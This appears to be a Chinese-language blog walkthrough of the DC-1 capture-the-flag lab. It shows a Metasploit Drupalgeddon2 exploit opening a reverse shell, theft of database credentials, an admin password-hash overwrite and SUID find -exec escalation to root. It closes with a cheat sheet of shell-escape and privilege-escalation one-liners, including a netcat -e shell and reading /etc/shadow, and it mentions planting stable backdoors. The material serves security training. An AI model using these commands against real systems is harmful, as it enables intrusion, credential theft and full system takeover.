DC-1

kali:192.168.32.135
靶机:192.168.32.140

arp-scan -l扫描到主机的ip,nmap扫描端口,nmap -sV -p- 192.168.32.140

root@kali:~# nmap -sV -p- 192.168.32.140
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 09:36 EDT
Nmap scan report for 192.168.32.140
Host is up (0.00064s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
52962/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:03:D1:4E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/su
Nmap done: 1 IP address (1 host up) scanned in 13.73 seconds

发现存在web服务,访问后云悉得到信息:

内容管理系统(CMS)                    Drupal                      7
Web服务器                          Apache                    2.2.22
编程语言                         PHP                       5.4.45
操作系统                         Debian
JavaScript库                        jQuery                      1.4.4

MSF大法好啊!直接搜索drupal的可利用漏洞,共出现7个,选择新一点会比较保险,18年的比较ok

msf5 > search drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   1  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   4  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   5  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   6  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index, for example use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.32.135   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)


msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.32.140
rhost => 192.168.32.140                                                                                                                       
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit                                                                                      
                                                                                                                                              
[*] Started reverse TCP handler on 192.168.32.135:4444                                                                                        
[*] Sending stage (38288 bytes) to 192.168.32.140                                                                                             
[*] Meterpreter session 1 opened (192.168.32.135:4444 -> 192.168.32.140:58870) at 2020-07-28 09:15:03 -0400

出现meterpreter >说明成功弹回shell, 执行python -c 'import pty;pty.spawn("/bin/bash")'获得一个交互式的Teriminal,继续推进,查看当前目录下的文件

www-data@DC-1:/var/www$ ls                    
ls
COPYRIGHT.txt       LICENSE.txt      cron.php     misc        sites
INSTALL.mysql.txt   MAINTAINERS.txt  flag1.txt    modules     themes
INSTALL.pgsql.txt   README.txt       includes     profiles    update.php
INSTALL.sqlite.txt  UPGRADE.txt      index.php    robots.txt  web.config
INSTALL.txt         authorize.php    install.php  scripts     xmlrpc.php

flag1.txtcat一下。

www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.

让我找config类的文件,而且是CMS里的,万年不变懒狗特技,find命令,顺带了解到Drupal的默认设置文件交settings.php

www-data@DC-1:/var/www$ find -name 'settings.php'
find -name 'settings.php'
./sites/default/settings.php
www-data@DC-1:/var/www$ cat ./sites/default/settings.php
cat ./sites/default/settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
......

发现flag2,翻译后得暴力和字典攻击并不是获得访问权限的唯一方法(而且您需要访问权限)。你将如何处理这些数据?在文件中还看到了数据库的相关信息,并且有一个低权限的账号。

www-data@DC-1:/var/www$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t

登录之后,先不说能不能提权,先要做一件我一直想做不敢做的事情,就是脱裤。(此处略过)

//查看一下数据库
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| ......                      |
| users                       |
| ......                      |
+-----------------------------+
80 rows in set (0.00 sec)

该数据库内存在巨多的表,先查看user

mysql> select * from users;
select * from users;
uidnamepass
0
1admin$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
2Fred$S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg

表中有两个账号,应该是drupal的账号,但是密码经过特殊的加密无法查看,看了大手子们的文章后了解到可以结合drupal的加密文件修改密码,具体操作如下:

www-data@DC-1:/var/www$ cd scripts
cd scripts
www-data@DC-1:/var/www/scripts$ cp -r ../includes ./
cp -r ../includes ./
www-data@DC-1:/var/www/scripts$ ls
ls
code-clean.sh  drupal.sh            generate-d6-content.sh  password-hash.sh
cron-curl.sh   dump-database-d6.sh  generate-d7-content.sh  run-tests.sh
cron-lynx.sh   dump-database-d7.sh  includes                test.script
www-data@DC-1:/var/www/scripts$ ./password-hash.sh Tr0jAn
./password-hash.sh Tr0jAn

password: Tr0jAn                hash: $S$DVhpAVWFG6k2HYLGwWnwCxWdVEXR4d91eIkcpQwHkkW0Y7cLAaV5

得到Tr0jAn加密后的hash值,进入数据库更新密码

mysql> update users set pass = '$S$DVhpAVWFG6k2HYLGwWnwCxWdVEXR4d91eIkcpQwHkkW0Y7cLAaV5' where name = 'admin';
<nwCxWdVEXR4d91eIkcpQwHkkW0Y7cLAaV5' where name = 'admin';                   
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0

此时可以回去登录了。

Dashboard看到了flag3内容如下:Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

反正大致意思就是告诉我需要怎么的找到密码,但是我需要execshadow(一脸懵逼.jpg

(又是看了大手子们的文章之后)此时需要先cat一下密码文件瞅瞅

www-data@DC-1:/var/www$ cat /etc/passwd
......
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

看到了flag4,去这个文件夹看看flag4

www-data@DC-1:/var/www$ cd /home/flag4
cd /home/flag4
www-data@DC-1:/home/flag4$ ls
ls
flag4.txt
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

这是提醒我该提权了,这激动人心的时刻终于到来了。

SUID提权-find命令之exec

SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。

常见具有提权的Linux可执行文件包括:Nmap,Vim,find,Bash,More,Less,Nano,cp;

利用find命令可以找到系统上正在运行的所有SUID可执行文件,但我们的目的是找出具有SUID权限位且属于root用户的文件,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
/ 表示从文件系统的顶部(根)开始并找到每个目录
-perm 表示搜索随后的权限
-u=s 表示查找root用户拥有的文件
-type 表示我们正在寻找的文件类型
f 表示常规文件,而不是目录或特殊文件
2 表示该进程的第二个文件描述符,即stderr(标准错误)
> 表示重定向
/dev/null 是一个特殊的文件系统对象,它将丢弃写入其中的所有内容。
www-data@DC-1:/$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

执行结果中有find命令,对其进行利用提权

www-data@DC-1:/$ find ./ Tr0jAn -exec '/bin/sh' \; 
# whoami
whoami
root
# find / -name '*flag*.txt'
find / -name '*flag*.txt'
/home/flag4/flag4.txt
/var/www/flag1.txt
/root/thefinalflag.txt
# cat /root/thefinalflag.txt
cat /root/thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

至此,DC-1的攻击已经全部完成了,但是在实战过程中,我们在MSF一把梭之后,应该进行shell升级,将其变成更稳定的后门,谨防被杀掉。

常见SUID提权命令

关于什么是SUID,我再这之外的一篇文章里写过了,忘了就再看看。

上面已经写过了用find命令查找具有SUID权限的文件的命令,这儿就不再赘述了。

vim

vim.tiny
#Press ESC key
:set shell=/bin/sh
:shell

find

find ./ Tr0jAn -exec '/bin/sh' \;

find+netcat

find Tr0jAn -exec netcat -lvp [Port] -e /bin/sh \;
netcat {ip:port}

bash

bash -p

less

less /etc/passwd
!/bin/sh

more

more /etc/passwd
!/bin/sh

ash、linux shell

sudo ash

awk

awk 'BEGIN {system("/bin/bash")}'

man

man passwd
!/bin/bash

python

import os
os.system("/bin/bash")

perl、ruby、lua、etc

exec "/bin/bash"

tcpdump

echo $'id\ncat /etc/shadow' > /tmp/.Tr0jAn
chmod +x /tmp/.Tr0jAn
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.Tr0jAn -Z root

cp

sudo sh -c 'cp $(which cp) .; chmod +s ./cp'

chmod

sudo sh -c 'cp $(which chmod) .; chmod +s ./chmod'
最后修改:2020 年 08 月 28 日 11 : 53 AM
请作者喝杯奶茶吧~